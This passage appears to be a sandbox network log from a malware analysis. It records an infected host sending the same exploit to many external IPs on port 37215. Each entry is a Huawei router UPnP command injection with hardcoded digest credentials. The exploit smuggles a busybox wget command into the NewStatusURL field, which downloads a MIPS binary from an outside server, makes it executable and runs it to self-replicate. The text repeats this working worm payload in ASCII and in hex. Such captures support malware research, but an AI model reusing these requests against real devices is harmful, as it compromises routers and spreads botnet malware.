                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2095192.168.2.234320490.176.189.1437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.613631010 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2096192.168.2.233294254.127.184.9437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.613687038 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2097192.168.2.235381041.91.36.8237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.613845110 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2098192.168.2.2360556197.206.85.22337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.613869905 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2099192.168.2.2340534157.16.67.16937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.613892078 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2100192.168.2.2336014157.113.205.8137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.613919973 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2101192.168.2.235375636.68.44.1337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.613925934 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2102192.168.2.2357890157.196.208.21237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.613944054 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2103192.168.2.2342388197.241.200.10337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.614043951 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2104192.168.2.2348278140.32.179.5337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.615148067 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2105192.168.2.2353244197.10.223.14437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.615231991 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
